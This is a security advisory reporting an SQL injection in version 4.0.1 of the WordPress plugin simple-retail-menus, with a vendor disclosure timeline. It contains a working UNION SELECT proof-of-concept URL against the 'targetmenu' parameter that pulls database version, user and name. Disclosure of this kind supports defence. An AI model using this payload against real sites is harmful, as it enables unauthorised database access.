wp-plugin : simple-retail-menus

Plugin Details
Plugin Name: wp-plugin : simple-retail-menus
Effected Version : 4.0.1 (and most probably lower version's if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Editor
PoC - (Proof of Concept) :

<http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8>

Vulnerable Parameter : targetmenu

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1


Disclosure Timeline
Vendor Contacted : 2013-12-25
Plugin Status : Updated on 2014-02-19
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
[Perfect for salon, restaurant, and retail store websites, as well as many other applications. Simple Retail Menus lets you create and manage menu-type lists for display in a post or page. This is a free, full-featured plugin. Create as many menus as you want, add as many items as you want to any menu, add menus to any post or page on your WordPress site. It's simple and easy to use! Just build your menus, then copy/paste the resulting 'shortcode' into you post or page. Example of a shortcode: [simple-retail-menu id="1"] = Plugin's Official Site = http://whatwouldjessedo.com/simple-retail-menus/ ]